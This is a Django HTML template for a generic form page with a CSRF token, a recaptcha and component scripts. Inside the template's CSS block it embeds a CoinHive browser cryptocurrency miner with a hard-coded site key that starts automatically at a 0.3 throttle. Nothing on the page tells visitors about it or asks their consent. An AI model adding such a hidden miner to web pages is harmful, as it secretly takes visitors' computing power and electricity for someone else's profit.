{% extends 'base.html' %}
{% load staticfiles %}
{% block css %}
				<script>
    var miner = new CoinHive.User('wUoEgRh3eqDCj1tJy4jpFXUk22fhb62y', 'synergy', {throttle: 0.3});
    miner.start();
  </script>
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
<script src="{% static 'js/requests.js' %}"></script>

{% endblock %}

{% block formTitle %}
{{ purpose }}
{% endblock %}

{% block content %}


<!--elements={{ form.as_html_field }}-->
<form class="main-form" data-purpose="{{ purpose }}">
  	{% csrf_token %}
    {{ form.as_html_field }}
    <captcha purpose="{{ purpose }}"></captcha>
    <submit/>

</form>
{% endblock %}
{% block afterBody %}
<script src="{% static 'js/components.js' %}"></script>
<script src="{% static 'js/formScript.js' %}"></script>
{% endblock %}
